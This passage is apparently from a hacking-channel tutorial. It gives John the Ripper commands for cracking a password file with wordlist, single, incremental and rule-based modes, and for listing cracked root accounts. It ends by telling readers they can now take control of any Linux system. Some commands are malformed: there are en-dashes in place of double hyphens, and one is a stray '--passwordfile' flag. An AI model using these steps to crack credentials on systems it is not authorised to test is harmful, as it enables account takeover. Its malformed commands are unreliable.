
4) This command below tells JtR to try “simple” mode, then the default wordlists containing likely passwords, and then “incremental” mode.

.\john.exe passwordfile

5) choose your worldlist and run :
.\john.exe passwordfile –wordlist=”wordlist.txt”

6) If you want to specify a cracking mode use the exact parameter for the mode.

.\john.exe --single passwordfile
.\john.exe --incremental passwordfile

7) adding rules to cracking mode :

.\john.exe --wordlist=”wordlist.txt” --rules --passwordfile

8) to see results :

>.\john.exe –show passwordfile

9) you wanna to see if you cracked any root users (UID=0) use the –users parameter.

.\john.exe --show --users=0 passwordfile

10) Well You Can start Cracking Now

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Well Done, After those Underc0de Tutorials You Are Able to crack any linux Os, To get controle or...